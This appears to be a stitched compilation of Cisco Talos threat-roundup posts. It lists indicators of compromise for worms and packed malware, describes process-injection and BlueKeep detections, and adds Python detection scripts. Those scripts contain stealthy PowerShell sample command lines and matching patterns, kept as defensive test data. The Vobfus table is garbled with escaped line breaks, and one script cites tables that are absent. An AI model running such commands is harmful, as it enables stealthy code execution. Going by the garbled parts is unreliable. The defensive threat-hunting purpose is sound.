`%SystemRoot%\Temp\Jenna Jameson - Built For Speed Downloader.exe` | 32
`%SystemRoot%\Temp\KaZaA media desktop v2.0 UNOFFICIAL.exe` | 32
`%SystemRoot%\Temp\Key generator for all windows XP versions.exe` | 32
`%SystemRoot%\Temp\LordOfTheRings-FullDownloader.exe` | 32
`%SystemRoot%\Temp\MSN Password Hacker and Stealer.exe` | 32
`%SystemRoot%\Temp\Macromedia Flash 5.0 Full Downloader.exe` | 32
`%SystemRoot%\Temp\Macromedia key generator (all products).exe` | 32

*See JSON for more IOCs

These are the lures the worm seeds into peer-to-peer shares: copies of itself named after cracks, key generators and pirated media, as described in the summary table.

#### File Hashes

```text
0b68f9af51bbf81c844c2918b585affdd9dd718b2947a561184773f67aeb1f6a
278cad9a78dbad1143db49335eb14979ea4d0ee92c57d2ee2d609174e64a9410
3de7e6becb18bcbc7b296570bedcde5298573aa173ab5b171e074837388e9009
4130a0b119e9ec6d19778832e4c46735be0dd0db1416804c3e812955422eb7aa
41e91ae33451c66142cd5a9a311eaf486a3120e6e5791b092ba0d6c5369488b5
44a2fe971055187936edd220bfd39b53d4a861f87dc26f571919b84ab97ee082
47e52b8ac3c6ff8f2dca34ad0956546c2bf6fa0402b284f2abcf68518a231c6c
4daf6f6578dd52f8622126e6aa602a34126971b27f8b3057fca64af77dcee47d
4ef1228ae3c74f4302f6e6310a76d2a927dcd3df449f0fd507447a0aba24f6e6
51c932a3be3232c21ad7c85b3a42bd69ac8c94b871d2d5ce71b5c7975c74bebb
53beca3b6a9f89775a63e5ac5cfc9bf19ec4ae0ef7610083c1d695fdcc1d3ccc
5ef82482de74c3c76c6ae5e84ed81a90467f2c893e9bdfbe15e0288629ed4bba
6074a512cdd562abd6b565d3d52b0623b699d1ae395fc5b636f287451d4b7d9b
60799126289b3b6cb6cc72c24c3dbfc047646915444ebe11c47be9153ae010a1
6a1421414241c9055b19ed82ff7017b867ec30d7dd958187d1c43470878b964c
6b7a03e862e6c5cf1a14ca0266fd6ab0dbc1919e7d3e8359929f48de3284bb57
6fbf4d256e79f5a00166750204384a7c0dbec8e506ed70e133f9661844563318
7dbcdde4d690e346735b7e282ae64e6f3c82ecf292aec7cf5936e1364d850293
7dc3a586bf6d1addc417169f1522f227cc546d49b3ff722bae8589380962a0fa
82855b7292f0db3a431b4aedf1b03ea39b043082ac31254bdc8201b4a597cf9b
8722a40d49f8dc67c85d9bf38e6a0c09f87141b1f1432a265e3bb465323ec196
890c5dd6a7ba3d245633fc9cc0ddc3710c4fbfbc2272889556b99e8e80fdf63d
9a5ae6f06d4db89fcb05f0aa434cabf8ca40c61523896a97ace25e86986bdcce
9e7a30c7ced797c5e329022a1557e2164bf790420ce08320c0b20cdc78937ad6
9e97a9bfb0e8e9b082f3c79146e3f34e2098de7404af807f6d90a62d48ff7e2e
```

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
Amp |  
Cloudlock | N/A
Cws |  
Email Security |  
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |  
Umbrella | N/A
Wsa | N/A

#### Screenshots of Detection

AMP: [detection screenshot](<https://1.bp.blogspot.com/-8i-yrtHaOSs/XWA92jEbT4I/AAAAAAAACYw/lQOGQ0bANok97_nsKjcnrpJIxg7nZQOZQCLcBGAs/s1600/0b68f9af51bbf81c844c2918b585affdd9dd718b2947a561184773f67aeb1f6a_amp.png>)

ThreatGrid: [detection screenshot](<https://1.bp.blogspot.com/--YgDFCIKDx8/XWA97oao53I/AAAAAAAACY4/9O5HZpZQNhcZ1-vGI5ymYj6l5QZghi0CACLcBGAs/s1600/0b68f9af51bbf81c844c2918b585affdd9dd718b2947a561184773f67aeb1f6a_tg.png>)

* * *

### Win.Packed.Xcnfe-7131484-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE`, value `trkcore` | 26
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM`, value `DisableTaskMgr` | 26
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0`, value `CheckSetting` | 22

Mutexes | Occurrences
---|---
`mxPWjmqQ8n` | 1
`tx0w71lvCy` | 1
`6exxyHtr5d` | 1
`G2HYsj3fFg` | 1
`JerlUkOuKL` | 1
`MiIl5jaHeB` | 1
`OaqotdMe7M` | 1
`SCmfJWJkxg` | 1
`UzS0XAm1fS` | 1
`dG6tI9ut6B` | 1
`3t5z9ncR4g` | 1
`Fnbk52Waor` | 1
`R6AEP2O20C` | 1
`UAZKOAGGs2` | 1
`k9oOrGi0aX` | 1
`l5nsV9SyRF` | 1
`pyka6wxPfy` | 1
`xmZSk4nyco` | 1
`ATgpy0BqxR` | 1
`NnWRFLviWv` | 1
`Qjy3zaZyv9` | 1
`agtFwXTy1f` | 1
`jReSCvTbxM` | 1
`jxvaMsSvTQ` | 1
`myY0J7QVPE` | 1

*See JSON for more IOCs

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`172[.]217[.]10[.]78` | 25
`104[.]20[.]208[.]21` | 14
`104[.]20[.]209[.]21` | 12
`172[.]217[.]6[.]206` | 1

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`pastebin[.]com` | 26
`www[.]ga1n8pm45j[.]com` | 1
`www[.]htoc9fu6lz[.]com` | 1
`www[.]d5spcpq7ma[.]com` | 1
`www[.]x9imtredft[.]com` | 1
`www[.]cv4ygugpgj[.]com` | 1
`www[.]gnzs22h5ae[.]com` | 1
`www[.]ctabhfeith[.]com` | 1
`www[.]1ditgmvebu[.]com` | 1
`www[.]fhgbysko8w[.]com` | 1
`www[.]svu9es1kaz[.]com` | 1
`www[.]mbke6vrdrw[.]com` | 1
`www[.]y428zntdqc[.]com` | 1
`www[.]pb1ymjotdh[.]com` | 1
`www[.]fvi6gtygop[.]com` | 1
`www[.]nacci0plbn[.]com` | 1
`www[.]tfbjnm8ss8[.]com` | 1
`www[.]bf3ktyulcd[.]com` | 1
`www[.]7hcgj1c7yi[.]com` | 1
`www[.]vgdxer8o9b[.]com` | 1
`www[.]efk8v7cwgz[.]com` | 1
`www[.]b2oes11vip[.]com` | 1
`www[.]kxzgxtsgzo[.]com` | 1
`www[.]bqwdgq9z5o[.]com` | 1
`www[.]9ryvqouwz2[.]com` | 1

*See JSON for more IOCs

Every sample resolves `pastebin[.]com`, while the mutex and the `www.<ten random characters>.com` domain are unique per sample, so those randomized values are of no use for hunting. The consistent artifacts are the `RunOnce` value `trkcore`, the `DisableTaskMgr` policy and the renamed copy of the original executable listed below.

Files and or directories created | Occurrences
---|---
`<malware cwd>\old_<malware exe name>` | 26

#### File Hashes

```text
03ab0d4316dba014132279a8fa00672dd72dc52010eca751cca0ceeffee2a940
08728191591ac79aca64917792a74cba2c615487efd3a1194c9bcb774c7a2bbe
0e150456f2a44be79d12adc971076182752864d5c975135609dde6396edf8f92
1650c30e8c7a2441fddc5ae39022d063787d6e9bf31136e7b7a4da058d0e127b
16a955f71500c4b96bb4f3477f295b1e03891e37ed3f15814f3e10e986b41891
2baea5f5924c3797df0292430d7c221c29affc31ac9e892cddce75318cbd4050
38f55600b63cf4b1dead874bb77508dbb367289d4ed39bfa501f38ce6864c561
4529b2919ba158197448b5a407f6399a7ad659aa4b6bfe84a0a69012251957d6
455dda508bbc9bb449541a164536c6ff349036138ace35ecd8b41f328d124868
49328a8570131578e7db5efb056fdfe0918da3022207f6f11fce28cc3ada0dd4
502394f8fd57179a0d32c6c16ec67553841ceb2d2502287ad72b24cf3bbcb940
66c52a00e0bbfc2521431b1093459445abfc410ab365fe18eaa6be4d39b290e5
6a428aa727871fd11bbe5c47c28133042711634b984640e9e61d07281349ebe1
7dc0103c383cbb391561b17c1b5519ff6d742f157d24780b8b89802bf8aeaca8
8b9ffb6981205ab934f0b0014157853099952feb642733dfaf22a36915eaf9e2
8dccacaa54c3735a10c22b876351b6503f5bbc5dec99acd0ac45f72302ea0cc1
8e31d779fb1b41faea824379012dc111909efd6ba6fd22fc3792c42d0d750c30
91a6ff4ea2c0dcefc1afc65a73b0354ebca82938abf16be2fdf5d0260c6a9fae
989193f39f3e95b4451cfd992692dd0e4ae06dd53cbddaacc4cde0e647b6cd26
992956d43b605e5382e17455cfbb08970fd9c95b38bbfda96efb053f4c9212e3
a24985a6f7bff0429bfabf4b0a42f222c152b40669459c068774674c3d156038
adf49cd22dae9ee319da7f8dc03b24eac649f982048b5542f9b377f7beeeb1ac
b1a5a9e9ddaec143aae51d0440d040ba98010724046c3a2b97e754d9784aa252
b492b4bbdc6a0661f22678cd3b80430279c29bd0eadbd947c1f44794dc56e99d
c10735796a4e90c0266e5c127a0b9ae3361a966c0bc5f1460fb9f3db66a3c519
```

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
Amp |  
Cloudlock | N/A
Cws |  
Email Security |  
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |  
Umbrella | N/A
Wsa | N/A

#### Screenshots of Detection

AMP: [detection screenshot](<https://1.bp.blogspot.com/-2jIYBgLW7EY/XWA-ITLJ_5I/AAAAAAAACZA/QE0gdMqY9jQPJ8YKTgg6uTT7eysdxTQpACLcBGAs/s1600/992956d43b605e5382e17455cfbb08970fd9c95b38bbfda96efb053f4c9212e3_amp.png>)

ThreatGrid: [detection screenshot](<https://1.bp.blogspot.com/-ENhb1cCK_zY/XWA-LAIpVQI/AAAAAAAACZE/jjibVriO3l0vIx46itDkJUo5_ihgtqRrQCLcBGAs/s1600/992956d43b605e5382e17455cfbb08970fd9c95b38bbfda96efb053f4c9212e3_tg.png>)

* * *

### Win.Worm.Vobfus-7123957-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR`, value `Locked` | 12
\n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: ShowSuperHidden ` | 12 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\AU ` | 12 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\AU \nValue Name: NoAutoUpdate ` | 12 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: fxrab ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: saoavir ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: kiupouv ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: liupiuh ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: juvil ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: xeaoro ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: loxem ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: qetap ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: kauuyom ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: jaoguo ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: reugo ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: meerad ` | 1 \nMutexes | Occurrences \n---|--- \n`\\BaseNamedObjects\\A` | 11 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`204[.]11[.]56[.]48` | 11 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`ns1[.]timedate3[.]com` | 11 \n`ns1[.]timedate1[.]com` | 11 \n`ns1[.]timedate1[.]net` | 11 \n`ns1[.]timedate3[.]net` | 11 \n`ns1[.]timedate2[.]com` | 11 \n`ns1[.]timedate3[.]org` | 11 \n`ns1[.]timedate1[.]org` | 11 \n`ns1[.]timedate2[.]org` | 11 \nFiles and or directories created | Occurrences \n---|--- \n`\\autorun.inf` | 12 \n`\\System Volume Information.exe` | 12 \n`\\$RECYCLE.BIN.exe` | 12 \n`\\Secret.exe` | 12 \n`\\Passwords.exe` | 12 \n`\\Porn.exe` | 12 \n`\\Sexy.exe` | 12 \n`E:\\autorun.inf` | 12 \n`E:\\$RECYCLE.BIN.exe` | 12 \n`E:\\Passwords.exe` | 12 \n`E:\\Porn.exe` | 12 \n`E:\\Secret.exe` | 12 \n`E:\\Sexy.exe` | 12 \n`E:\\System Volume Information.exe` | 12 \n`E:\\x.mpeg` | 12 \n`%HOMEPATH%\\Passwords.exe` | 12 \n`%HOMEPATH%\\Porn.exe` | 12 \n`%HOMEPATH%\\Secret.exe` | 12 \n`%HOMEPATH%\\Sexy.exe` | 12 \n`\\<random, matching '[a-z]{4,7}'>.exe` | 12 \n`E:\\<random, matching '[a-z]{4,7}'>.exe` | 12 \n`%HOMEPATH%\\<random, matching '[a-z]{5,7}'>.exe` | 12 \n`%HOMEPATH%\\RCX<random, matching '[A-F0-9]{3,4}'>.tmp` | 9 \n \n#### File Hashes\n\n` 0426c4c36a4793fcbd52f68d1c31620ed0500bc9999c8cae4be03cd7307299d8 7c7a93cc53493be184545ec97e05763dc16dd4fd6aff6da00b7cb3f00091427e cac1b67bfdfc89299cd8720ad33004591bd65fa7eae30ac9b41d8bba158b036c e0d2b56017c438c095800e361ccd7dc27991d0414ce90c0ba9e841220a7c4cc4 e30608735f6e814e40dfd878d4ef1f236660e6ebb4541d6496509493aec5058b f0cf9a4022dbd84685941b3043fd899c4411f9109ea1a09188190705deab8793 f7808bd853e4d50ea09aa31fe8f4c2593391e73f4e73e94a737ae9a074d04abb fca71f3c3fbf6bde78320761bef612e2d7ab278b86e8ae63a70a55708f9600fa fd225f346b89b87ed234350ee6aa8ee61816865b67369d45ac17b8aaf9bacbba fd283c48a116a0f724d0817ae861deb561da5c8890f82dbf1241e9e692730ad6 fd3c422dd572255bac29ff57d36f2fc619d8665ac81c822b12f24d2a338bc3ed fe7a44bb5409772b8386a585c6bdfce47fa978d29cf0203eb9d547490daa776c `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  
\nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Lpz26TFk6Hc/XWA-aW8ghBI/AAAAAAAACZQ/IUI0INRqZDooc8QoesMzgEyMzZfAlcGNACLcBGAs/s1600/cac1b67bfdfc89299cd8720ad33004591bd65fa7eae30ac9b41d8bba158b036c_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-M0MRfrZa3ao/XWA-u0s4YcI/AAAAAAAACZg/TXdrAUrwiIQ1TvDieeajEHwvj-ImesSSwCLcBGAs/s1600/7c7a93cc53493be184545ec97e05763dc16dd4fd6aff6da00b7cb3f00091427e_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-qIkly23-24A/XWA-pf1uocI/AAAAAAAACZY/1rDIsJ2nO5wWLQIkcn3Gm3xTi_Cjk9dpQCLcBGAs/s1600/fd3c422dd572255bac29ff57d36f2fc619d8665ac81c822b12f24d2a338bc3ed_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nMadshi injection detected \\- (1156) \n--- \nMadshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique. \nCVE-2019-0708 detected \\- (1075) \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). 
Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nKovter injection detected \\- (580) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nProcess hollowing detected \\- (526) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nDealply adware detected \\- (244) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nExcessively long PowerShell command detected \\- (214) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nGamarue malware detected \\- (53) \nGamarue is a family of malware that can download files and steal information from an infected system. 
Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.

**Installcore adware detected** (34)

InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising as pop-ups or by injecting into browsers and adding or altering advertisements on web pages. Adware is known to sometimes download and install malware.

**Atom Bombing code injection technique detected** (25)

A process created a suspicious atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer; atoms placed in the global atom table are accessible from every process. Malware abuses this by storing shellcode as a global atom and then queueing an asynchronous procedure call (APC) in a target process that retrieves the atom, which copies the shellcode into the target's address space; a further APC-driven stage then executes it. The Dridex malware family is known to use Atom Bombing, but other threats may leverage it as well.

**PowerShell file-less infection detected** (15)

A PowerShell command was stored in an environment variable and run. The environment variable is typically set by a previously run stage so that the script body never appears on the PowerShell command line or on disk, which serves as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.
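The two PowerShell entries above describe what a detection keys on: an abnormally long command line, and a script body pulled out of an environment variable and handed to an evaluator. The following Python is an added example, not part of the Talos roundup and not AMP's logic: it applies those two heuristics, plus decoding of `-EncodedCommand` so the check runs on what would actually execute, to constructed process-creation records. The record schema (`pid`, `image`, `cmdline`), the length threshold and the sample command lines are assumptions made for the example.

```python
"""Heuristics for the two PowerShell behaviours described above, applied to
constructed process-creation records. Added example; not AMP's detection logic."""
import base64
import re

LONG_CMDLINE_THRESHOLD = 1000  # assumption: tune to your environment's baseline

# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
_ENCODED = re.compile(
    r"(?i)(?:^|\s)-e(?:c|n|nc|nco|ncod|ncode|ncoded|ncodedc|ncodedco|ncodedcom|"
    r"ncodedcomm|ncodedcomma|ncodedcomman|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
# Script text sourced from an environment variable ...
_ENV_SOURCE = re.compile(r"(?i)\$env:\w+|GetEnvironmentVariable\s*\(|%\w+%")
# ... and handed to an evaluator.
_EXEC = re.compile(r"(?i)\biex\b|invoke-expression")
# Switches that hide the window or disable the execution policy.
_STEALTH = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden|-e(?:p|xecutionpolicy)\s+bypass")


def decode_encoded_command(b64):
    """-EncodedCommand carries UTF-16LE text, base64-encoded. None if malformed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass ValueError
        return None


def analyze(event):
    """Return the list of heuristics an event trips (empty for non-PowerShell images)."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if image not in ("powershell.exe", "pwsh.exe"):
        return []
    cmd = event["cmdline"]
    reasons = []
    if len(cmd) > LONG_CMDLINE_THRESHOLD:
        reasons.append("excessively_long_command_line")
    if _STEALTH.search(cmd):
        reasons.append("stealth_switches")
    script = cmd  # text inspected for the env-var pattern
    m = _ENCODED.search(cmd)
    if m:
        reasons.append("encoded_command")
        decoded = decode_encoded_command(m.group(1))
        if decoded is not None:
            script = decoded  # inspect what will actually run, not the base64
    if _ENV_SOURCE.search(script) and _EXEC.search(script):
        reasons.append("script_from_environment_variable")
    return reasons


def triage(events):
    """Map pid -> tripped heuristics for every event that tripped at least one."""
    out = {}
    for ev in events:
        reasons = analyze(ev)
        if reasons:
            out[ev["pid"]] = reasons
    return out


def _encode(ps):
    """Build an -EncodedCommand argument the way powershell.exe expects it."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample records (not taken from the roundup).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_PS_EVENTS = [
    # routine scheduled task: no evaluator, no env var, short
    {"pid": 1001, "image": PS, "cmdline": r"powershell.exe -NoProfile -File C:\ops\backup.ps1"},
    # huge inline script: the "excessively long command line" case
    {"pid": 1002, "image": PS,
     "cmdline": 'powershell.exe -w hidden -c "$a=\'' + "A" * 1200 + '\';iex $a"'},
    # Kovter/Poweliks style: hidden window, encoded command that evaluates $env:kvt
    {"pid": 1003, "image": PS, "cmdline": "powershell.exe -w hidden -enc " + _encode("iex $env:kvt")},
    # not PowerShell at all
    {"pid": 1004, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
    # same technique through the .NET API, no encoding
    {"pid": 1005, "image": PS,
     "cmdline": "powershell.exe -c \"iex ([Environment]::GetEnvironmentVariable('zxq','Process'))\""},
]

if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_PS_EVENTS).items():
        print(pid, ", ".join(reasons))
```

The length threshold is deliberately a parameter: legitimate deployment scripts can produce long command lines, so the value should come from a baseline of your own process-creation telemetry, and the env-var heuristic (evaluator plus environment-variable source in the same command) is the higher-confidence signal of the two.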

* * *

Source: Cisco Talos blog, "Threat Roundup for August 16 to August 23", published 2019-08-23, <http://feedproxy.google.com/~r/feedburner/Talos/~3/2sq8-uD9dcM/threat-roundup-0816-0823.html>. CVE referenced: CVE-2019-0708 (CVSS v2 base score 10.0, AV:N/AC:L/Au:N/C:C/I:C/A:C).

## Talos releases coverage for 'wormable' Microsoft vulnerability

Last night, Cisco Talos released the latest [SNORT® rule update](<https://snort.org/advisories/talos-rules-2019-05-20>), which includes coverage for the critical Microsoft vulnerability CVE-2019-0708.

The company disclosed this vulnerability last week as part of its [monthly security update](<https://blog.talosintelligence.com/2019/05/MS-Patch-Tuesday-May-2019.html>). This particular bug exists in Remote Desktop Services, formerly known as Terminal Services.

The vulnerability requires no user interaction and is pre-authentication. Microsoft specifically warned about this bug because it is "wormable," meaning future malware that exploits this vulnerability could spread from system to system. One of the most infamous examples of a worm was the [WannaCry malware](<https://blog.talosintelligence.com/2017/05/wannacry.html>), which disabled major services across the globe in May 2017. An attacker could exploit this vulnerability by sending a specially crafted request to the target system's Remote Desktop Service via RDP.

Snort rule 50137 covers indicators associated with this vulnerability.
You can learn more about this release at the Snort blog [here](<https://blog.snort.org/2019/05/snort-rule-update-for-may-20-2019.html>).

Source: Cisco Talos blog, "Talos releases coverage for 'wormable' Microsoft vulnerability", published 2019-05-21, <http://feedproxy.google.com/~r/feedburner/Talos/~3/EPiqmeriWpY/talos-releases-coverage-for-wormable.html>. CVE referenced: CVE-2019-0708 (CVSS v2 base score 10.0, AV:N/AC:L/Au:N/C:C/I:C/A:C).

* * *

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 3 and Jan. 10. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post summarizes the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and discusses how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category.
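The tables in this roundup publish indicators defanged (`172[.]217[.]12[.]206`, `%APPDATA%\pid.txt`, `<HKCU>\...`) and, as the paragraph above stresses, a single indicator is a lead rather than a verdict. The following Python is an added example, not Talos's code or tooling: it refangs a handful of indicators copied from the Razy and Tofsee tables below, matches them against constructed host telemetry (network connections, DNS queries, file writes, registry writes), and flags a host only when indicators from at least two categories corroborate each other. The telemetry records and their field names, the environment-variable expansions, and the two-category threshold are assumptions made for the example.

```python
"""Refang the roundup's defanged indicators, match them against host telemetry,
and require corroboration across indicator categories before flagging a host.
Added example; the telemetry below is constructed."""
import ipaddress
import re
from collections import defaultdict

# A few indicators of each kind, copied from the Razy and Tofsee tables below
# and kept defanged exactly as published.
SAMPLE_IOCS = {
    "ip": ["172[.]217[.]12[.]206", "77[.]88[.]21[.]158", "43[.]231[.]4[.]6/31"],
    "domain": ["smtp[.]yandex[.]com", "whatismyipaddress[.]com"],
    "file": [r"%APPDATA%\pid.txt", r"%TEMP%\holdermail.txt"],
    "registry": [r"<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE"],
}

# Placeholders the tables use, mapped to regexes over a real Windows path (assumed layout).
_ENV_VARS = {
    "%APPDATA%": r".*\\AppData\\Roaming",
    "%TEMP%": r".*\\Temp",
    "%HOMEPATH%": r".*\\Users\\[^\\]+",
    "%SystemRoot%": r".*\\Windows",
}
_HIVES = {"<HKCU>": "HKEY_CURRENT_USER", "<HKLM>": "HKEY_LOCAL_MACHINE", "<HKU>": "HKEY_USERS"}


def refang(ioc):
    """'172[.]217[.]12[.]206' -> '172.217.12.206'; hxxp -> http."""
    ioc = ioc.replace("[.]", ".").replace("(.)", ".")
    return re.sub(r"(?i)^hxxp", "http", ioc)


def path_pattern(template):
    """Turn '%APPDATA%\\pid.txt' into a case-insensitive regex over a full path."""
    rx = re.escape(template)
    for var, expansion in _ENV_VARS.items():
        rx = rx.replace(re.escape(var), expansion)
    return re.compile("^" + rx + "$", re.IGNORECASE)


def registry_prefix(template):
    """'<HKCU>\\...' -> lower-cased 'hkey_current_user\\...' for prefix matching."""
    for tag, hive in _HIVES.items():
        template = template.replace(tag, hive)
    return template.lower()


def compile_iocs(iocs):
    return {
        "ip": [ipaddress.ip_network(refang(x), strict=False) for x in iocs["ip"]],  # CIDRs too
        "domain": {refang(x).lower() for x in iocs["domain"]},
        "file": [path_pattern(x) for x in iocs["file"]],
        "registry": [registry_prefix(x) for x in iocs["registry"]],
    }


def match(compiled, kind, value):
    """kind is the telemetry type: conn (dst IP), dns (queried name), file, registry."""
    if kind == "conn":
        try:
            addr = ipaddress.ip_address(value)
        except ValueError:
            return False
        return any(addr in net for net in compiled["ip"])
    if kind == "dns":
        return value.lower().rstrip(".") in compiled["domain"]
    if kind == "file":
        return any(rx.match(value) for rx in compiled["file"])
    if kind == "registry":
        return any(value.lower().startswith(p) for p in compiled["registry"])
    return False


MIN_CATEGORIES = 2  # assumption: one category alone is a lead, not a verdict


def score_hosts(compiled, events):
    """Return {host: {kind: [matched values]}} for hosts with hits in >= MIN_CATEGORIES kinds."""
    hits = defaultdict(lambda: defaultdict(list))
    for ev in events:
        if match(compiled, ev["kind"], ev["value"]):
            hits[ev["host"]][ev["kind"]].append(ev["value"])
    return {h: dict(k) for h, k in hits.items() if len(k) >= MIN_CATEGORIES}


# Constructed telemetry (not from the roundup). ws02 only reached a shared Google
# front-end address, which the tables themselves mark as not indicating maliciousness.
SAMPLE_TELEMETRY = [
    {"host": "ws01", "kind": "dns", "value": "smtp.yandex.com"},
    {"host": "ws01", "kind": "file", "value": r"C:\Users\bob\AppData\Roaming\pid.txt"},
    {"host": "ws02", "kind": "conn", "value": "172.217.12.206"},
    {"host": "ws03", "kind": "dns", "value": "whatismyipaddress.com."},
    {"host": "ws03", "kind": "conn", "value": "43.231.4.7"},
    {"host": "ws03", "kind": "registry",
     "value": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\goods"},
    {"host": "ws04", "kind": "file", "value": r"C:\Users\eve\Documents\pid.txt"},
]

if __name__ == "__main__":
    for host, hits in score_hosts(compile_iocs(SAMPLE_IOCS), SAMPLE_TELEMETRY).items():
        print(host, hits)
```

Keeping the indicators defanged in the source data and refanging only at match time avoids a hunting query that itself looks like a connection attempt, and the category threshold is what turns the "does not indicate maliciousness" caveat on the network tables into a concrete rule.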
